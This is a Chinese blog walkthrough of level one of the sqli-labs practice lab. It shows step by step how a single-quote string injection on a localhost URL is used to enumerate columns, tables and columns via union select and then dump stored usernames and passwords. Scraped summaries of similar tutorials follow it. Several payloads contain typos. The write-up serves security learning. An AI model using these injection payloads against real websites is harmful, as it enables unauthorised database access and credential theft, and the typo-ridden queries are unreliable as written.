sqli-labs-master 闯关第一关,单引号 ' 字符型注入

最新推荐文章于 2025-02-08 15:42:18 发布
最新推荐文章于 2025-02-08 15:42:18 发布
阅读量2.7k 收藏 5
点赞数 2
文章标签: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39030256/article/details/84205045
版权
本文详细介绍了如何通过SQL注入攻击sqli-labs第一关,包括识别注入点、确定字段数、使用union查询、获取数据库信息及用户凭证等步骤,适合初学者实践SQL注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-labs-master第一关

注:%23为#的url编码

第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动注入查询数据库,一步一步的来获取

第一步

先测试出有注入点  在url中  输入http://localhost/sql/sqli-labs-master/Less-1/?id=1'  

 

 

我们可以看到页面中出现sql语句报错,接下来用  http://localhost/sql/sqli-labs-master/Less-1/?id=1'  and 1 = 1 %23  看到回显正常

 

 

用  http://localhost/sql/sqli-labs-master/Less-1/?id=1'  and 1 = 2 %23   没回显,也就是回显失败,证明有注入点

 

 

接下来就是猜测字段(表有几列)

输入  http://localhost/sql/sqli-labs-master/Less-1/?id=1'  order by 1 %23   看到回显正常

 

 

提高两个   http://localhost/sql/sqli-labs-master/Less-1/?id=1'  order by 3 %23  回显正常

 

 

再加一个   http://localhost/sql/sqli-labs-master/Less-1/?id=1'  order by 4 %23   回显失败,所以有三个字段

 

 

用union查询语句查询报错回显位置   http://localhost/sql/sqli-labs-master/Less-1/?id=1' and 1 = 2 union select 1,2,3 %23

显示报错回显在第二、第三字段

注:and 1 = 2 是让前面为假,也可以不用and 1 = 2 ,用  ?id = -1'  http://localhost/sql/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23   效果是一样的

 

 

查询数据库版本号、名称    http://localhost/sql/sqli-labs-master/Less-1/?id=1' and 1 = 2 union select 1,database,3 %23

查看到当前数据库版本号和名称

 

 

查看数据库中的表的名称信息    http://localhost/sql/sqli-labs-master/Less-1/?id=1' and 1 = 2 union select 1,2,group_concat(table_name) from information_schema.tabels where table_schema = 'security'; %23

可以看到数据库中所有表的名称

 

 

查看表users中的信息   http://localhost/sql/sqli-labs-master/Less-1/?id=1' and 1 = 2 union select 1,2,group_concat(column_name) from information_schema.tabelscolumns where table_name = 'users'; %23

注:group_concat函数是将查询会显得结果用逗号隔开显示

看到users表中的列的名称,看到有 username   和  password 两列

 

 

查看并列出  username  和  password   两列中的所有信息

http://localhost/sql/sqli-labs-master/Less-1/?id=1' and 1 = 2 union select 1,group_concat(username),group_concat(password) from users %23

现在自己想要的用户名和密码都已经列出,大功告成,Your Login和Your Password 逐一对应即可

 

 

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

 

ID不重要
关注
Sqli-labs-master(1-65)
kfjrlgagkogkhpa的博客
08-11 640
sqli-lab(1-65)
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3044
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
SQL 注入之 WindowsDocker 环境 SQLi-labs 靶场搭建!_sqli-labs docker
最新发布
logic1001的博客
02-08 1050
SQLi-labs是由印度程序员开发,专门用于练习SQL注入的靶场,其中包含各种注入姿势,并适用于GET和POST等场景。主要包含:基础错误注入、报错注入、盲注、MySQL读写文件、更新查询注入、插入查询注入、Header头部注入、二次注入、绕过WAF、绕过addslashes函数、绕过mysql_real_escape_string函数、堆叠注入
sqli-labs闯关
m0_54642732的博客
01-28 1004
我们注入一个order by为5,即猜测表中有5列数据,他返回个错误,这下我们就知道了,他没有五列数据,我们就可以用二分法(100,50,25,12,6,3)来探查到底有几列数据,我们最终发现这个表有三列数据。我们发现查了1,2,3,他就返回了1,2,3,当我们查询数据库名字database(),数据库版本version()的时候他也会显示。既然我们可以输入一个id,那我们是否可以输入一些其他的语句,来获取更多的数据呢,答案是当然的,接下来我们就要依靠上面的知识。列数相同时,数据就合并了。
sqli_labs第一关
weixin_30924087的博客
03-25 228
安装 从https://github.com/Audi-1/sqli-labs下载源代码 搭建环境用的是phpstudy 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。 为了方便看见sql语句,在$sql这句话下面添加echo...这句。 $sql="SELECT * FROM users WHERE id='...
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3150
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1806
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs-master靶场之1-21关通关秘籍
m0_66241651的博客
07-03 864
此靶场就是让我们掌握sql注入的基本方法,通关秘籍来了,轻轻松松搞定!
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 412
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
sqli-labs系列——第一关
1匹黑马
04-26 4006
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sqli-labs-master通关(持续更新...)
weixin_54438700的博客
09-06 734
输入单引号,页面报错,爆出sql语句,考虑字符型单引号注入
sqli-labs-master(Less1--Less5)
2301_81105268的博客
04-17 1265
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。from information_schema.tables即table_name的内容在这个数据库里的tables表里查询,并且有个条件是table_name这个表所属的数据库是security。由此可判断闭合为:')输入3显示正常,输入4报错,则判断数据库中的字段数为3。
SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)
_Co1a
12-19 3331
SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或者web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入的原理: 用户输入的数据被当作代码拼接到代码语句里面执行,造成一些不可估量的后果 危害: 你的数据被别人窃取,甚至被别人全部
SQL&sqli-labs-master
Jackie's Blog
04-03 1259
SQL注入学习&个人sqli-labs-master靶场练习
048 SQL注入实验——sqli-labs-master,sqlmap自动化
鸡蛋炒鸡蛋
03-03 1840
文章目录一:sqli-labs-master的部署二:sqli注入通关2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
sqli-labs 第一关是数字型注入还是字符型注入
12-30
### SQLi-Labs 第一关 注入类型的分析 对于SQLi-Labs第一关注入点位于URL参数`id`中。通过尝试不同的输入可以发现,当向`id`参数传递特殊字符时能够影响查询逻辑并返回异常结果或预期之外的数据。 具体来说,在第一关中的测试表明该注入点接受字符串形式的输入来改变SQL语句结构[^3]。例如,使用单引号闭合原有查询条件,并利用`UNION SELECT`附加新的子查询以获取额外的信息: ```http http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3% ``` 这证明了此位置存在基于字符串的SQL注入漏洞,即字符型SQL注入。因此,SQLi-Labs第一关属于字符型而非数字型SQL注入场景。 为了进一步验证这一点,还可以尝试其他方式如直接拼接表名和列名到查询中提取数据: ```http http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users# ``` 上述请求成功执行后会返回用户名和密码组合的结果集,再次确认这是一个典型的字符型SQL注入实例[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值